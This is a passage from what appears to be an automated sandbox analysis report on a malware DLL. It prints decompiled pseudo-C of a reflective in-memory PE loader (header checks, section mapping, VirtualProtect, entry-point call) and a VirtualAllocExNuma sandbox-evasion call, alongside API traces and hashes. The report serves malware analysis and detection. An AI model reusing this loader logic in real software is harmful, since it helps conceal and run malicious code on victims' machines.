                                                                                                                                				intOrPtr _t84;
                                                                                                                                				intOrPtr _t92;
                                                                                                                                				void* _t101;
                                                                                                                                				intOrPtr _t102;
                                                                                                                                				void* _t103;
                                                                                                                                				intOrPtr* _t105;
                                                                                                                                				signed char _t108;
                                                                                                                                				void* _t110;
                                                                                                                                				void* _t111;
                                                                                                                                				void* _t120;
                                                                                                                                				intOrPtr _t122;
                                                                                                                                				intOrPtr _t131;
                                                                                                                                				intOrPtr* _t137;
                                                                                                                                				intOrPtr _t146;
                                                                                                                                				intOrPtr* _t149;
                                                                                                                                				long _t152;
                                                                                                                                				long _t153;
                                                                                                                                				signed int _t154;
                                                                                                                                				void* _t155;
                                                                                                                                				void* _t156;
                                                                                                                                				void* _t158;
                                                                                                                                
                                                                                                                                				_t147 =  *((intOrPtr*)(_t158 + 0x3c));
                                                                                                                                				 *((intOrPtr*)(_t158 + 0x14)) = __ecx;
                                                                                                                                				_t155 = 0;
                                                                                                                                				_t62 = E10003D80( *((intOrPtr*)(_t158 + 0x3c)), 0x40);
                                                                                                                                				if(_t62 != 0) {
                                                                                                                                					_t105 =  *((intOrPtr*)(_t158 + 0x3c));
                                                                                                                                					if( *_t105 != 0x5a4d) {
                                                                                                                                						L16:
                                                                                                                                						SetLastError(0xc1);
                                                                                                                                						return 0;
                                                                                                                                					} else {
                                                                                                                                						if(E10003D80(_t147,  *((intOrPtr*)(_t105 + 0x3c)) + 0xf8) == 0) {
                                                                                                                                							L35:
                                                                                                                                							return 0;
                                                                                                                                						} else {
                                                                                                                                							_t149 =  *((intOrPtr*)(_t105 + 0x3c)) + _t105;
                                                                                                                                							if( *_t149 != 0x4550 ||  *((intOrPtr*)(_t149 + 4)) != 0x14c) {
                                                                                                                                								goto L16;
                                                                                                                                							} else {
                                                                                                                                								_t108 =  *(_t149 + 0x38);
                                                                                                                                								if((_t108 & 0x00000001) != 0) {
                                                                                                                                									goto L16;
                                                                                                                                								} else {
                                                                                                                                									_t120 = ( *(_t149 + 0x14) & 0x0000ffff) + _t149 + 0x18;
                                                                                                                                									_t68 =  *(_t149 + 6) & 0x0000ffff;
                                                                                                                                									if(_t68 > 0) {
                                                                                                                                										_t137 = _t120 + 0xc;
                                                                                                                                										_t154 = _t68;
                                                                                                                                										do {
                                                                                                                                											_t146 =  *((intOrPtr*)(_t137 + 4));
                                                                                                                                											_t102 =  *_t137;
                                                                                                                                											if(_t146 != 0) {
                                                                                                                                												_t103 = _t102 + _t146;
                                                                                                                                											} else {
                                                                                                                                												_t103 = _t102 + _t108;
                                                                                                                                											}
                                                                                                                                											if(_t103 > _t155) {
                                                                                                                                												_t155 = _t103;
                                                                                                                                											}
                                                                                                                                											_t137 = _t137 + 0x28;
                                                                                                                                											_t154 = _t154 - 1;
                                                                                                                                										} while (_t154 != 0);
                                                                                                                                									}
                                                                                                                                									__imp__GetNativeSystemInfo(_t158 + 0x14); // executed
                                                                                                                                									_t122 =  *((intOrPtr*)(_t158 + 0x18));
                                                                                                                                									_t70 =  !(_t122 - 1);
                                                                                                                                									_t152 =  *((intOrPtr*)(_t149 + 0x50)) + _t122 - 0x00000001 & _t70;
                                                                                                                                									if(_t152 == (_t122 + _t155 - 0x00000001 & _t70)) {
                                                                                                                                										_t71 = VirtualAlloc( *(_t149 + 0x34), _t152, 0x3000, 4); // executed
                                                                                                                                										_t156 = _t71;
                                                                                                                                										if(_t156 != 0) {
                                                                                                                                											L19:
                                                                                                                                											_t73 = HeapAlloc(GetProcessHeap(), 8, 0x34);
                                                                                                                                											_t153 = _t73;
                                                                                                                                											if(_t153 != 0) {
                                                                                                                                												 *(_t153 + 4) = _t156;
                                                                                                                                												 *((intOrPtr*)(_t153 + 0x1c)) =  *((intOrPtr*)(_t158 + 0x44));
                                                                                                                                												 *(_t153 + 0x14) = ( *(_t149 + 0x16) & 0x0000ffff) >> 0x0000000d & 0x00000001;
                                                                                                                                												 *((intOrPtr*)(_t153 + 0x28)) =  *((intOrPtr*)(_t158 + 0x50));
                                                                                                                                												 *((intOrPtr*)(_t153 + 0x20)) =  *((intOrPtr*)(_t158 + 0x48));
                                                                                                                                												 *((intOrPtr*)(_t153 + 0x24)) =  *((intOrPtr*)(_t158 + 0x4c));
                                                                                                                                												 *((intOrPtr*)(_t153 + 0x30)) =  *((intOrPtr*)(_t158 + 0x18));
                                                                                                                                												if(E10003D80( *((intOrPtr*)(_t158 + 0x40)),  *(_t149 + 0x54)) == 0) {
                                                                                                                                													L34:
                                                                                                                                													E10004470(_t153);
                                                                                                                                													goto L35;
                                                                                                                                												} else {
                                                                                                                                													_t81 = VirtualAlloc(_t156,  *(_t149 + 0x54), 0x1000, 4); // executed
                                                                                                                                													_t110 = _t81;
                                                                                                                                													E10003C80(_t110,  *((intOrPtr*)(_t158 + 0x3c)),  *(_t149 + 0x54));
                                                                                                                                													_t84 =  *((intOrPtr*)(_t158 + 0x48));
                                                                                                                                													_t131 =  *((intOrPtr*)(_t158 + 0x4c));
                                                                                                                                													_t158 = _t158 + 0xc;
                                                                                                                                													_t111 = _t110 +  *((intOrPtr*)(_t84 + 0x3c));
                                                                                                                                													 *_t153 = _t111;
                                                                                                                                													 *(_t111 + 0x34) = _t156;
                                                                                                                                													if(E10003DA0( *((intOrPtr*)(_t158 + 0x1c)), _t84, _t131, _t149, _t153) == 0) {
                                                                                                                                														goto L34;
                                                                                                                                													} else {
                                                                                                                                														_t87 =  *((intOrPtr*)( *_t153 + 0x34)) ==  *(_t149 + 0x34);
                                                                                                                                														if( *((intOrPtr*)( *_t153 + 0x34)) ==  *(_t149 + 0x34)) {
                                                                                                                                															 *((intOrPtr*)(_t153 + 0x18)) = 1;
                                                                                                                                														} else {
                                                                                                                                															 *((intOrPtr*)(_t153 + 0x18)) = E10004110(_t153, _t87);
                                                                                                                                														}
                                                                                                                                														if(E100041A0(_t153) == 0) {
                                                                                                                                															goto L34;
                                                                                                                                														} else {
                                                                                                                                															_push(_t153);
                                                                                                                                															if(E10003F80( *((intOrPtr*)(_t158 + 0x10))) == 0 || E100040D0(_t153) == 0) {
                                                                                                                                																goto L34;
                                                                                                                                															} else {
                                                                                                                                																_t92 =  *((intOrPtr*)( *_t153 + 0x28));
                                                                                                                                																if(_t92 == 0) {
                                                                                                                                																	 *((intOrPtr*)(_t153 + 0x2c)) = 0;
                                                                                                                                																	return _t153;
                                                                                                                                																} else {
                                                                                                                                																	if( *(_t153 + 0x14) == 0) {
                                                                                                                                																		 *((intOrPtr*)(_t153 + 0x2c)) = _t92 + _t156;
                                                                                                                                																		return _t153;
                                                                                                                                																	} else {
                                                                                                                                																		_push(0);
                                                                                                                                																		_push(1);
                                                                                                                                																		_push(0x10000000);
                                                                                                                                																		if( *((intOrPtr*)(_t156 + _t92))() != 0) {
                                                                                                                                																			 *((intOrPtr*)(_t153 + 0x10)) = 1;
                                                                                                                                																			return _t153;
                                                                                                                                																		} else {
                                                                                                                                																			SetLastError(0x45a);
                                                                                                                                																			goto L34;
                                                                                                                                																		}
                                                                                                                                																	}
                                                                                                                                																}
                                                                                                                                															}
                                                                                                                                														}
                                                                                                                                													}
                                                                                                                                												}
                                                                                                                                											} else {
                                                                                                                                												VirtualFree(_t156, _t73, 0x8000);
                                                                                                                                												goto L21;
                                                                                                                                											}
                                                                                                                                										} else {
                                                                                                                                											_t101 = VirtualAlloc(_t71, _t152, 0x3000, 4); // executed
                                                                                                                                											_t156 = _t101;
                                                                                                                                											if(_t156 == 0) {
                                                                                                                                												L21:
                                                                                                                                												SetLastError(0xe);
                                                                                                                                												return 0;
                                                                                                                                											} else {
                                                                                                                                												goto L19;
                                                                                                                                											}
                                                                                                                                										}
                                                                                                                                									} else {
                                                                                                                                										goto L16;
                                                                                                                                									}
                                                                                                                                								}
                                                                                                                                							}
                                                                                                                                						}
                                                                                                                                					}
                                                                                                                                				} else {
                                                                                                                                					return _t62;
                                                                                                                                				}
                                                                                                                                			}































                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 10003D80: SetLastError.KERNEL32(0000000D,1000451A,?,00000040,00000010,00000000,0000000F,100047D0,?,00000000,10004340,10004350,10004370,00000000,10003A63,00000000), ref: 10003D8C
                                                                                                                                • GetNativeSystemInfo.KERNEL32(?,?,?,00000000,?,00000040,00000010,00000000,0000000F,100047D0,?,00000000,10004340,10004350,10004370,00000000), ref: 100045B2
                                                                                                                                • SetLastError.KERNEL32(000000C1,00000000,?,00000040,00000010,00000000,0000000F,100047D0,?,00000000,10004340,10004350,10004370,00000000,10003A63,00000000), ref: 100045D9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast$InfoNativeSystem
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3902313427-0
                                                                                                                                • Opcode ID: c6fd34f4addf312a17fd4a0b55a816a8bca61e53f64dce2c2923f383c8579b65
                                                                                                                                • Instruction ID: a884f337d3fb6e3feb3d3e86e5afcf7fae1a1a5031e57e08741fb19a7bb57766
                                                                                                                                • Opcode Fuzzy Hash: c6fd34f4addf312a17fd4a0b55a816a8bca61e53f64dce2c2923f383c8579b65
                                                                                                                                • Instruction Fuzzy Hash: 5681DFB6605706AFE350DF65DC80B67B3E8FF88380F01452DEA4987245EB71E948CB99
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                C-Code - Quality: 91%
                                                                                                                                			E10005838(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                				intOrPtr _t50;
                                                                                                                                				void* _t54;
                                                                                                                                				intOrPtr _t57;
                                                                                                                                				intOrPtr* _t59;
                                                                                                                                				intOrPtr* _t63;
                                                                                                                                				void* _t76;
                                                                                                                                				void* _t77;
                                                                                                                                				intOrPtr* _t80;
                                                                                                                                				char* _t81;
                                                                                                                                				char _t84;
                                                                                                                                				intOrPtr* _t87;
                                                                                                                                				intOrPtr* _t118;
                                                                                                                                				intOrPtr* _t123;
                                                                                                                                				void* _t124;
                                                                                                                                				void* _t125;
                                                                                                                                
                                                                                                                                				_push(0x54);
                                                                                                                                				E10007B94(E1001557E, __ebx, __edi, __esi);
                                                                                                                                				_t84 =  *((intOrPtr*)(_t124 + 8));
                                                                                                                                				_t123 = __ecx;
                                                                                                                                				if(_t84 != 0xffffffff) {
                                                                                                                                					_t87 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x24))));
                                                                                                                                					_t118 = 0;
                                                                                                                                					__eflags = _t87;
                                                                                                                                					if(_t87 == 0) {
                                                                                                                                						L7:
                                                                                                                                						_t50 =  *((intOrPtr*)(_t123 + 0x4c));
                                                                                                                                						__eflags = _t50 - _t118;
                                                                                                                                						if(_t50 != _t118) {
                                                                                                                                							__eflags =  *((intOrPtr*)(_t123 + 0x3c)) - _t118;
                                                                                                                                							if(__eflags != 0) {
                                                                                                                                								 *((char*)(_t124 - 0x30)) = _t84;
                                                                                                                                								E1000563A(_t84, _t124 - 0x2c, _t109, 8, _t118);
                                                                                                                                								 *((intOrPtr*)(_t124 - 4)) = _t118;
                                                                                                                                								_t54 = E10004AEE(E10005335(_t124 - 0x2c, _t124 - 0x48));
                                                                                                                                								_t57 = E10004AEE(E10005335(_t124 - 0x2c, _t124 - 0x50));
                                                                                                                                								_t118 =  *((intOrPtr*)(_t124 - 0x18)) + _t54;
                                                                                                                                								_push(_t124 - 0x38);
                                                                                                                                								_t84 = _t123 + 0x44;
                                                                                                                                								while(1) {
                                                                                                                                									_t113 = _t124 - 0x30;
                                                                                                                                									 *((intOrPtr*)(_t124 - 0x34)) = _t57;
                                                                                                                                									_t59 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x3c)))) + 0x14))(_t84, _t124 - 0x30, _t124 - 0x2f, _t124 - 0x3c, _t57, _t118);
                                                                                                                                									__eflags = _t59;
                                                                                                                                									if(_t59 < 0) {
                                                                                                                                										break;
                                                                                                                                									}
                                                                                                                                									__eflags = _t59 - 1;
                                                                                                                                									if(_t59 > 1) {
                                                                                                                                										__eflags = _t59 - 3;
                                                                                                                                										if(__eflags != 0) {
                                                                                                                                											goto L25;
                                                                                                                                										} else {
                                                                                                                                											_t63 = E1000513D(__eflags,  *((intOrPtr*)(_t124 - 0x30)),  *((intOrPtr*)(_t123 + 0x4c)));
                                                                                                                                											__eflags = _t63;
                                                                                                                                											if(_t63 != 0) {
                                                                                                                                												goto L27;
                                                                                                                                											} else {
                                                                                                                                												goto L25;
                                                                                                                                											}
                                                                                                                                										}
                                                                                                                                									} else {
                                                                                                                                										_t118 =  *((intOrPtr*)(_t124 - 0x38)) - E10004AEE(E10005335(_t124 - 0x2c, _t124 - 0x58));
                                                                                                                                										__eflags = _t118;
                                                                                                                                										if(_t118 == 0) {
                                                                                                                                											L16:
                                                                                                                                											_t67 = _t124 - 0x30;
                                                                                                                                											 *((char*)(_t123 + 0x41)) = 1;
                                                                                                                                											__eflags =  *((intOrPtr*)(_t124 - 0x3c)) - _t124 - 0x30;
                                                                                                                                											if( *((intOrPtr*)(_t124 - 0x3c)) != _t124 - 0x30) {
                                                                                                                                												L27:
                                                                                                                                												_t123 =  *((intOrPtr*)(_t124 + 8));
                                                                                                                                											} else {
                                                                                                                                												__eflags = _t118;
                                                                                                                                												if(_t118 > 0) {
                                                                                                                                													L20:
                                                                                                                                													 *((intOrPtr*)(_t124 - 0x40)) = E10004AEE(E10005335(_t124 - 0x2c, _t124 - 0x48));
                                                                                                                                													_t57 = E10004AEE(E10005335(_t124 - 0x2c, _t124 - 0x50));
                                                                                                                                													_push(_t124 - 0x38);
                                                                                                                                													_t118 =  *((intOrPtr*)(_t124 - 0x18)) +  *((intOrPtr*)(_t124 - 0x40));
                                                                                                                                													__eflags = _t118;
                                                                                                                                													continue;
                                                                                                                                												} else {
                                                                                                                                													__eflags =  *((intOrPtr*)(_t124 - 0x18)) - 0x20;
                                                                                                                                													if( *((intOrPtr*)(_t124 - 0x18)) >= 0x20) {
                                                                                                                                														goto L25;
                                                                                                                                													} else {
                                                                                                                                														E1000540E(_t67, _t124 - 0x2c, _t113, _t123, 8, 0);
                                                                                                                                														goto L20;
                                                                                                                                													}
                                                                                                                                												}
                                                                                                                                											}
                                                                                                                                										} else {
                                                                                                                                											_t76 = E10004AEE(E10005335(_t124 - 0x2c, _t124 - 0x60));
                                                                                                                                											_push( *((intOrPtr*)(_t123 + 0x4c)));
                                                                                                                                											_push(_t118);
                                                                                                                                											_push(1);
                                                                                                                                											_push(_t76);
                                                                                                                                											_t77 = E1000910B(_t84, _t113, _t118, _t123, __eflags);
                                                                                                                                											_t125 = _t125 + 0x10;
                                                                                                                                											__eflags = _t118 - _t77;
                                                                                                                                											if(_t118 != _t77) {
                                                                                                                                												L25:
                                                                                                                                												__eflags = _t123;
                                                                                                                                											} else {
                                                                                                                                												goto L16;
                                                                                                                                											}
                                                                                                                                										}
                                                                                                                                									}
                                                                                                                                									E10001220(_t124 - 0x2c, _t124, 1, 0);
                                                                                                                                									goto L2;
                                                                                                                                								}
                                                                                                                                								goto L25;
                                                                                                                                							} else {
                                                                                                                                								_t50 = E1000513D(__eflags, _t84, _t50); // executed
                                                                                                                                								__eflags = _t50;
                                                                                                                                								if(_t50 == 0) {
                                                                                                                                									goto L8;
                                                                                                                                								} else {
                                                                                                                                									goto L6;
                                                                                                                                								}
                                                                                                                                							}
                                                                                                                                						} else {
                                                                                                                                							L8:
                                                                                                                                						}
                                                                                                                                					} else {
                                                                                                                                						_t80 =  *((intOrPtr*)(__ecx + 0x34));
                                                                                                                                						_t109 =  *_t80 + _t87;
                                                                                                                                						__eflags = _t87 -  *_t80 + _t87;
                                                                                                                                						if(_t87 >=  *_t80 + _t87) {
                                                                                                                                							goto L7;
                                                                                                                                						} else {
                                                                                                                                							 *_t80 =  *_t80 - 1;
                                                                                                                                							__eflags =  *_t80;
                                                                                                                                							_t123 =  *((intOrPtr*)(__ecx + 0x24));
                                                                                                                                							_t81 =  *_t123;
                                                                                                                                							 *_t123 = _t81 + 1;
                                                                                                                                							 *_t81 = _t84;
                                                                                                                                							L6:
                                                                                                                                						}
                                                                                                                                					}
                                                                                                                                				} else {
                                                                                                                                				}
                                                                                                                                				L2:
                                                                                                                                				return E10007BDE(_t84, _t118, _t123);
                                                                                                                                			}


















                                                                                                                                0x10005887
                                                                                                                                0x10005863
                                                                                                                                0x10005863
                                                                                                                                0x10005868
                                                                                                                                0x1000586a
                                                                                                                                0x1000586c
                                                                                                                                0x00000000
                                                                                                                                0x1000586e
                                                                                                                                0x1000586e
                                                                                                                                0x1000586e
                                                                                                                                0x10005870
                                                                                                                                0x10005873
                                                                                                                                0x10005878
                                                                                                                                0x1000587a
                                                                                                                                0x1000587c
                                                                                                                                0x1000587c
                                                                                                                                0x1000586c
                                                                                                                                0x1000584e
                                                                                                                                0x1000584e
                                                                                                                                0x10005850
                                                                                                                                0x10005855

                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Fputc$H_prolog3_
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2569218679-3916222277
                                                                                                                                • Opcode ID: a884318f4328bbd472d3bb720561ede03dd2b99da71aac4f53e77f2ee89f8c52
                                                                                                                                • Instruction ID: f54ee80827257d936e0228d5c33a263367e2bb758273396e4a1a0a6abebb7dc9
                                                                                                                                • Opcode Fuzzy Hash: a884318f4328bbd472d3bb720561ede03dd2b99da71aac4f53e77f2ee89f8c52
                                                                                                                                • Instruction Fuzzy Hash: A7519F7AA00644DFEF14CBA4C8819DFB7B5EF483D1F618519E512A7289EF72BA04CB50
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 265 10003ed0-10003eda 266 10003ee3-10003eec 265->266 267 10003edc-10003ee0 265->267 268 10003f2a-10003f51 266->268 269 10003eee-10003ef3 266->269 270 10003f53 268->270 271 10003f59-10003f71 VirtualProtect 268->271 272 10003f20-10003f27 269->272 273 10003ef5-10003ef9 269->273 270->271 274 10003f13-10003f1a VirtualFree 273->274 275 10003efb-10003f07 273->275 274->272 275->274 276 10003f09-10003f11 275->276 276->272 276->274
                                                                                                                                C-Code - Quality: 94%
                                                                                                                                			E10003ED0(intOrPtr* _a4, long _a8) {
                                                                                                                                				signed int _t25;
                                                                                                                                				signed int _t27;
                                                                                                                                				intOrPtr* _t32;
                                                                                                                                				void** _t37;
                                                                                                                                				signed int _t39;
                                                                                                                                				long _t45;
                                                                                                                                				void* _t55;
                                                                                                                                				long _t57;
                                                                                                                                
                                                                                                                                				_t37 = _a8;
                                                                                                                                				_t57 = _t37[2];
                                                                                                                                				if(_t57 != 0) {
                                                                                                                                					_t25 = _t37[3];
                                                                                                                                					if((_t25 & 0x02000000) == 0) {
                                                                                                                                						_t45 =  *(0x1001b144 + ((_t25 >> 0x1f) + ((_t25 >> 0x0000001e & 0x00000001) + (_t25 >> 0x0000001d & 0x00000001) * 2) * 2) * 4);
                                                                                                                                						if((_t25 & 0x04000000) != 0) {
                                                                                                                                							_t45 = _t45 | 0x00000200;
                                                                                                                                						}
                                                                                                                                						_t27 = VirtualProtect( *_t37, _t57, _t45,  &_a8); // executed
                                                                                                                                						asm("sbb eax, eax");
                                                                                                                                						return  ~( ~_t27);
                                                                                                                                					} else {
                                                                                                                                						_t55 =  *_t37;
                                                                                                                                						if(_t55 == _t37[1]) {
                                                                                                                                							if(_t37[4] != 0) {
                                                                                                                                								L7:
                                                                                                                                								VirtualFree(_t55, _t57, 0x4000); // executed
                                                                                                                                							} else {
                                                                                                                                								_t32 = _a4;
                                                                                                                                								_t39 =  *(_t32 + 0x30);
                                                                                                                                								if( *((intOrPtr*)( *_t32 + 0x38)) == _t39 || _t57 % _t39 == 0) {
                                                                                                                                									goto L7;
                                                                                                                                								}
                                                                                                                                							}
                                                                                                                                						}
                                                                                                                                						return 1;
                                                                                                                                					}
                                                                                                                                				} else {
                                                                                                                                					return _t57 + 1;
                                                                                                                                				}
                                                                                                                                			}












                                                                                                                                APIs
                                                                                                                                • VirtualFree.KERNELBASE(?,?,00004000,-00000027,00000000,100040AE,?,?), ref: 10003F1A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FreeVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1263568516-0
                                                                                                                                • Opcode ID: b39a3beb2d98f3bab114e4e754a4af2823bffd341a29ed4bde50550ae92bfda1
                                                                                                                                • Instruction ID: 062725d00f4cf23427ed1042fe15ee65968b5e79625691509249fc532a46f6e0
                                                                                                                                • Opcode Fuzzy Hash: b39a3beb2d98f3bab114e4e754a4af2823bffd341a29ed4bde50550ae92bfda1
                                                                                                                                • Instruction Fuzzy Hash: 85118F36A042139BE341CA19D884FA773AAFBC5390F56C669E4458B298D731EC42C790
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 277 10001050-10001072 GetCurrentProcess VirtualAllocExNuma 278 10001074 277->278 279 1000107e-10001091 call 10006bf0 277->279 278->279
                                                                                                                                C-Code - Quality: 46%
                                                                                                                                			E10001050(intOrPtr _a8) {
                                                                                                                                				intOrPtr _v20;
                                                                                                                                				void* __edi;
                                                                                                                                				void* __esi;
                                                                                                                                				void* _t3;
                                                                                                                                				void* _t7;
                                                                                                                                				void* _t9;
                                                                                                                                
                                                                                                                                				_t8 = _a8;
                                                                                                                                				_push(0);
                                                                                                                                				_push(0x40);
                                                                                                                                				_push(0x3000);
                                                                                                                                				_push(_a8);
                                                                                                                                				_push(0);
                                                                                                                                				_t3 = GetCurrentProcess();
                                                                                                                                				_push(_t3); // executed
                                                                                                                                				L100047D4(); // executed
                                                                                                                                				_t9 = _t3;
                                                                                                                                				if(_t9 != 0) {
                                                                                                                                					 *0x1001b044 = 0;
                                                                                                                                				}
                                                                                                                                				E10006BF0(_t7, _t8, _t9, _t9, _v20, _t8);
                                                                                                                                				return _t9;
                                                                                                                                			}










                                                                                                                                APIs
                                                                                                                                • GetCurrentProcess.KERNEL32(00000000,745FD360,00003000,00000040,00000000,00000010,745FD360,100037DE,?,00000011), ref: 10001062
                                                                                                                                • VirtualAllocExNuma.KERNEL32(00000000,?,?,?,?,?,?,?,LdrF,00000004), ref: 10001069
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocCurrentNumaProcessVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 346376999-0
                                                                                                                                • Opcode ID: 2fd65e3a78f7370afcb230f8d38f5365579a55a7de8ef90f74ca61644ae3f8a0
                                                                                                                                • Instruction ID: 007a731be77cd4dfc1ab7fe5343192b3b75cb8ea39ff0d8a89b7cdf0d5bda86e
                                                                                                                                • Opcode Fuzzy Hash: 2fd65e3a78f7370afcb230f8d38f5365579a55a7de8ef90f74ca61644ae3f8a0
                                                                                                                                • Instruction Fuzzy Hash: 67E08676A0526077F13197599C15F4B66ACDFC5B90F014014F7049B1A4C7B4E80083A5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 282 10003da0-10003dca 283 10003dd0-10003dd9 282->283 284 10003e84-10003e90 282->284 285 10003de0-10003de4 283->285 286 10003de6-10003def 285->286 287 10003e1c-10003e32 call 10003d80 285->287 288 10003df1-10003e03 VirtualAlloc 286->288 289 10003e66-10003e7e 286->289 291 10003e93-10003e9c 287->291 295 10003e34-10003e48 VirtualAlloc 287->295 288->291 292 10003e09-10003e1a call 10003c50 288->292 289->284 289->285 298 10003e63 292->298 295->291 297 10003e4a-10003e60 call 10003c80 295->297 297->298 298->289
                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E10003DA0(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                                				intOrPtr _v4;
                                                                                                                                				intOrPtr _v8;
                                                                                                                                				intOrPtr* _t27;
                                                                                                                                				intOrPtr _t28;
                                                                                                                                				void* _t34;
                                                                                                                                				intOrPtr _t38;
                                                                                                                                				intOrPtr _t44;
                                                                                                                                				void* _t47;
                                                                                                                                				intOrPtr _t66;
                                                                                                                                				long _t67;
                                                                                                                                				long* _t70;
                                                                                                                                				void* _t76;
                                                                                                                                
                                                                                                                                				_t76 =  &_v8;
                                                                                                                                				_t27 = _a16;
                                                                                                                                				_t44 =  *((intOrPtr*)(_t27 + 4));
                                                                                                                                				_t28 =  *_t27;
                                                                                                                                				_v4 = __ecx;
                                                                                                                                				_t47 = ( *(_t28 + 0x14) & 0x0000ffff) + _t28 + 0x18;
                                                                                                                                				_v8 = 0;
                                                                                                                                				if(0 >=  *((intOrPtr*)(_t28 + 6))) {
                                                                                                                                					L11:
                                                                                                                                					return 1;
                                                                                                                                				} else {
                                                                                                                                					_t70 = _t47 + 0x10;
                                                                                                                                					do {
                                                                                                                                						_t30 =  *_t70;
                                                                                                                                						if( *_t70 != 0) {
                                                                                                                                							if(E10003D80(_a8, _t70[1] + _t30) == 0) {
                                                                                                                                								goto L12;
                                                                                                                                							} else {
                                                                                                                                								_t34 = VirtualAlloc( *((intOrPtr*)(_t70 - 4)) + _t44,  *_t70, 0x1000, 4); // executed
                                                                                                                                								if(_t34 == 0) {
                                                                                                                                									goto L12;
                                                                                                                                								} else {
                                                                                                                                									_t66 =  *((intOrPtr*)(_t70 - 4)) + _t44;
                                                                                                                                									E10003C80(_t66, _t70[1] + _a4,  *_t70);
                                                                                                                                									 *((intOrPtr*)(_t70 - 8)) = _t66;
                                                                                                                                									goto L9;
                                                                                                                                								}
                                                                                                                                							}
                                                                                                                                						} else {
                                                                                                                                							_t67 =  *(_a12 + 0x38);
                                                                                                                                							if(_t67 <= 0) {
                                                                                                                                								goto L10;
                                                                                                                                							} else {
                                                                                                                                								if(VirtualAlloc( *((intOrPtr*)(_t70 - 4)) + _t44, _t67, 0x1000, 4) == 0) {
                                                                                                                                									L12:
                                                                                                                                									return 0;
                                                                                                                                								} else {
                                                                                                                                									 *((intOrPtr*)(_t70 - 8)) =  *((intOrPtr*)(_t70 - 4)) + _t44;
                                                                                                                                									E10003C50( *((intOrPtr*)(_t70 - 4)) + _t44, 0, _t67);
                                                                                                                                									L9:
                                                                                                                                									_t76 = _t76 + 0xc;
                                                                                                                                									goto L10;
                                                                                                                                								}
                                                                                                                                							}
                                                                                                                                						}
                                                                                                                                						goto L13;
                                                                                                                                						L10:
                                                                                                                                						_t38 = _v8 + 1;
                                                                                                                                						_t70 =  &(_t70[0xa]);
                                                                                                                                						_v8 = _t38;
                                                                                                                                					} while (_t38 < ( *( *_a16 + 6) & 0x0000ffff));
                                                                                                                                					goto L11;
                                                                                                                                				}
                                                                                                                                				L13:
                                                                                                                                			}
















                                                                                                                                APIs
                                                                                                                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 10003DFF
